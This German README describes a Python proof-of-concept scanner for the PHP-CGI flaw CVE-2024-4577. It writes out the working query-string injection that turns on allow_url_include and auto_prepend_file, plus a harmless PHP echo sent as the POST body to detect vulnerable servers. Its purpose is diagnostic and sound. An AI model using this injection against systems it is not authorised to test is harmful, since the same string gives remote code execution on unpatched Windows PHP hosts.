
Python PoC-Skript zum Testen auf CVE-2024-4577 PHP CGI-Sicherheitslücke mittels Query-String-Injection und POST-Payload, um die Server-Anfälligkeit zu bestimmen.
Dieses Python-Skript ist ein einfaches PoC (Proof of Concept) Tool zur Diagnose der neuesten PHP-Schwachstelle CVE-2024-4577.
⚠️ Dieses Tool wird zu Sicherheitsdiagnosezwecken bereitgestellt und darf nur auf eigenen Systemen oder mit vorheriger Genehmigung verwendet werden.
Diese Schwachstelle tritt auf, wenn PHP im CGI-Modus unter Windows arbeitet und es durch Umgehung von Multibyte-Zeichen ermöglicht wird, beliebige PHP-Einstellungen einzuschleusen und die Codeausführung zu erzwingen.
Dieses Skript sendet einen query-string-basierten Umgehungs-Payload und PHP-Code per POST-Anfrage an die Ziel-URL, um die Schwachstelle zu überprüfen.
python3 --version
pip install requests
python3 cve_2024_4577_test.py
Beispieleingabe:
http://192.168.0.10/index.php
Oder nur den Stammpfad eingeben, wird automatisch verarbeitet
http://192.168.0.10
✅ [✅] Schwachstelle: Der Server hat PHP-Code ausgeführt.
→ Der Server ist anfällig.
✔️ [✔️] Nicht anfällig oder blockiert
→ Antwort erhalten, aber Schwachstelle nicht ausgelöst.
❌ [❌] Anfrage fehlgeschlagen: ...
→ Test aufgrund von Verbindungsfehler, Timeout usw. fehlgeschlagen.
Einschleusen der Umgehungszeichenfolge der Schwachstelle:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
Einschleusen von PHP-Code in den POST-Body:
<?php echo 'CVE-2024-4577-TEST'; ?>
Wenn der Server diesen Code ausführt, ist die entsprechende Zeichenfolge in der Antwort enthalten, sodass eine Beurteilung möglich ist.
Dieses Skript wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Das Scannen oder Testen nicht autorisierter Systeme ist illegal. Der Benutzer trägt die alleinige Verantwortung.
| Dateiname | Beschreibung |
|---|---|
cve_2024_4577_test.py | Python-Skript zum Testen der Schwachstelle |
README.md | Dokumentation zur Verwendung und Beschreibung (diese Datei) |
LICENSE.txt |
Bugs oder Vorschläge bitte per E-Mail oder PR melden.
Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE für Details. Copyright (c) 2025 KimJuhyeong95